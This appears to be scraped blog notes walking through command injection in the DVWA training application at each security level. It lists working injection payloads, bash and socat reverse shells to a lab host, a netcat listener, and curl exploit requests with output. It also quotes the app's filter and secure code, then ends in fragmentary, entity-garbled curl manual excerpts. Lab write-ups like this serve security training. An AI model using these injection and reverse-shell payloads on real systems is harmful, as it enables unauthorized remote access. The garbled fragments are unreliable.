AWVS Command Injection
In Linux & amp; & amp; - Execute the next command after the previous command succeeds || - Execute the next command after the previous command fails
request-example (high)
Low
There are no restrictions.
8.8.8.8;/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1" ;/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1"
The browser will display a timeout after a long time.
(rlwrap nc -lvnp 9999)
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
If nc exits in time, the browser echoes:
curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \ -d 'ip=|id & amp;Submit=Submit' \ -H "Cookie: security=low;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \ -s | grep uid The curl parameter description is at the bottom↓
https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/
Medium
” & amp; & amp;”, “;” are replaced with nothing. Single ” & amp; ” is not filtered.
In Linux, the & amp; symbol means to execute the command in the background.
will output the job number, process ID, job status, and the command that started the job
(https://linuxize.com/post/how-to-run-linux-commands-in-background/)
The | symbol means that the output of the previous command is used as the input of the next command, which is often referred to as the pipe character. Commands after the pipe will attempt to run regardless of the output of the command before the pipe.
For example
8.8.8.8 & amp;/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1" 8.8.8.8 & amp;/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1" & amp; & amp;/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1" 8.8.8.8|/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1" 8.8.8.8|/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1" & amp; |/bin/bash -c "bash -i > & amp; /dev/tcp/192.168.0.161/9999 0> & amp;1" & amp;
High
There are the following filters, the third “|” is followed by a space, similar to medium, the difference is that more filters are added.
$substitutions = array(
' & amp;' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
Use socat for remote connection
socat is a multi-functional network tool under Linux, the name comes from “Socket CAT”. Its function is similar to Netcat, and it can be regarded as an enhanced version of Netcat. 【https://cybr.com/ethical-hacking-archives/create-a-reverse-shell-with-socat-dvwa-os-command-injections/】
socat is a command-line based utility that builds two bidirectional byte streams and transfers data between them. (Manual)
PHP trim() – remove whitespace (or other characters) at the beginning and end of a string
8.8.8.8|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint |socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/
curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id & amp;Submit=Submit' \
-H "Cookie: security=high;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \
-s | grep uid
<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
Impossible
:(
<?php
if( isset( $_POST[ 'Submit' ] ) ) {<!-- -->
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$target = $_REQUEST['ip'];
$target = stripslashes( $target );
// Split the IP into 4 octects
$octet = explode( ".", $target );
// Check IF each octet is an integer
if( ( is_numeric( $octet[0] ) ) & amp; & amp; ( is_numeric( $octet[1] ) ) & amp; & amp; ( is_numeric( $octet[2] ) ) & amp; & amp; ( is_numeric( $octet[3] ) ) & amp; & amp; ( sizeof( $octet ) == 4 ) ) {<!-- -->
// If all 4 octets are int's put the IP back together.
$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {<!-- -->
//Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {<!-- -->
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{<!-- -->$cmd}
“;
}
else {
// Ops. Let the user name theres a mistake
echo ‘
ERROR: You have entered an invalid IP.
‘;
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
curl parameter description (Manual)
-X, --request <method>
-X HEAD will not suffice. You need to use the -I, --head option.
The method string you set with -X, --request will be used for all requests, which if you for example use -L, --location may cause unintended side-effects when curl does not
If -X, --request is provided several times, the last set value will be used.
curl -X "DELETE" https://example.com
curl -X NLST ftp://example.com/
-d, --data <data>
--data-raw is almost the same but does not have a special interpretation of the @ character. To post data purely binary, you should instead use the --data-binary option. To
URL-encode the value of a form field you may use --data-urlencode.
If any of these options is used more than once on the same command line, the data pieces specified will be merged with a separating &-symbol. Thus, using '-d name=daniel -d
named 'foobar' would thus be done with -d, --data @foobar. When -d, --data is told to read from a file like that, carriage returns and newlines will be stripped out. If you
do not want the @ character to have a special interpretation use --data-raw instead.
-d, --data can be used several times in a command line
curl -d "name=curl" https://example.com
curl -d "name=curl" -d "tool=cmdline" https://example.com
curl -d @filename https://example.com
See also --data-binary, --data-urlencode and --data-raw. This option is mutually exclusive to -F, --form and -I, --head and -T, --upload-file.
-H, --header <header/@file>
Without knowing perfectly well what you are doing. Remove an internal header by giving a replacement without content on the right side of the colon, as in: -H "Host:". If
you send the custom header with no-value then its header must be terminated with a semicolon, such as -H "X-Custom-Header;" to send "X-Custom-Header:".
-H, --header can be used several times in a command line
curl -H "X-First-Name: Joe" https://example.com
curl -H "User-Agent: yes-please/2000" https://example.com
curl -H "Host:" https://example.com
curl -H @headers.txt https://example.com
HTTP/0.9 is a completely headerless response and therefore you can also connect with this to non-HTTP servers and still get a response since curl will simply transparently
The headers this option sets can be overridden with -H, --header as usual.
(HTTP) Extra header to include in the request when sending HTTP to a proxy. You may specify any number of extra headers. This is the equivalent option to -H, --header but
(HTTP) Sends the "Referrer Page" information to the HTTP server. This can also be set with the -H, --header flag of course. When used with -L, --location you can append
See also -A, --user-agent and -H, --header.
with the -H, --header or the --proxy-header options.
See also -H, --header and --proxy-header.
-s, --silent
Use -S, --show-error in addition to this option to disable progress meter but still show error messages.
Providing -s, --silent multiple times has no extra effect. Disable it again with --no-silent.
curl -s https://example.com
See also -v, --verbose, --stderr and --no-progress-meter.